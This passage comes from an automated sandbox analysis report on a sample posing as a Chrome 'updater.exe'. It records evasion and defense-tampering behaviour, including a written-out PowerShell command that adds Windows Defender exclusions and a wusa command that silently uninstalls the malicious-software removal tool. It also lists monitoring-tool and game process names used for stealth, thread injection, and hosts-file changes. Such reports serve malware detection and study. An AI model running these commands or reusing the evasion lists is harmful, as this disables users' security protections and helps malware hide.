                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE#9
                Source: conhost.exe, 00000027.00000003.2729787268.000002862EC60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SAVSCAN.EXE,SPIDER.EXE,XCOMMSVR.EXE,PROCMON64A.EXE,PROCMON64.EXE,PROCMON.EXE,ANVIR.EXE,REGEDIT.EXE,MRT.EXE
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEE_
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MGUI.EXE, NAVAPSVC.EXE, NAVAPW32.EXE,NAVW32.EXE,NSMDTR.EXE,OFCDOG.EXE,PAV.EXE,SAVSCAN.EXE,SPIDER.EXE,XCOMMSVR.EXE,PROCMON64A.EXE,PROCMON64.EXE,PROCMON.EXE,ANVIR.EXE,REGEDIT.EXE,MRT.EXE",
                Source: conhost.exe, 00000027.00000003.2729787268.000002862EC60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SAVSCAN.EXE,SPIDER.EXE,XCOMMSVR.EXE,PROCMON64A.EXE,PROCMON64.EXE,PROCMON.EXE,ANVIR.EXE,REGEDIT.EXE,MRT.EXESTEALTH-FULLSCREENALGO
                Source: conhost.exe, 00000027.00000003.2729787268.000002862EC60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: XTG1DJUKBUWPY1XDKR1HBJMYAYZX1RYDALGSGF6CDTAOGZGV5AJPBWXSTEALTH-TARGETSTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV
                Source: conhost.exe, 00000027.00000003.2729787268.000002862EC60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV
                Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLUOT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE
                Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEGRAMDATA=C:
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6624Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3194Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7505
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2034
                Source: C:\ProgramData\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\maoxoafwbtki.sysJump to dropped file
                Source: C:\Windows\System32\conhost.exeAPI coverage: 0.8 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352Thread sleep count: 6624 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352Thread sleep count: 3194 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3596Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796Thread sleep count: 7505 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796Thread sleep count: 2034 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6188Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\System32\wusa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\conhost.exeCode function: 36_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,36_2_0000000140001160

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 2568Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 5596Jump to behavior
                Modifies the hosts file
                Source: C:\Users\user\Desktop\updater.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe conhost.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
